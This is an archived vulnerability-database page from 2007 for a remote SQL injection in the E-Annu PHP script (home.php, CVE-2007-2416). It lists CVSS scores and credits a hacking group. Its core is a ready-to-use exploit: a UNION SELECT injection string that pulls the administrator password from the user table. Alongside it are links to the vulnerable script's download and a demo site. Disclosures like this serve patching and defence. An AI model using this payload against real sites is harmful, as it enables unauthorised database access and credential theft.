Bug: E-Annu (home.php) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

E-Annu (home.php) Remote SQL Injection Vulnerability

Published
Credit
Risk
2007.05.02
ilker kandemir
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-2416
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-------------------------------------------------AYYILDIZ.ORG PreSents...

Script: E-Annu

Script D.: http://www.alic.ch/sources/annu.rar
Script Demo: http://www.autocash.ch/annu/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info: */ Siz Yokken AYYILDIZ Vardi. */

-------------------------------------------------Exploit:

home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/
**/WHERE/**/user_id=1/*

-------------------------------------------------

Reklam yeri: Turkistiklal.com

-------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,X-Hacker,Ajann
Special Tnx: AYYILDIZ.ORG

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version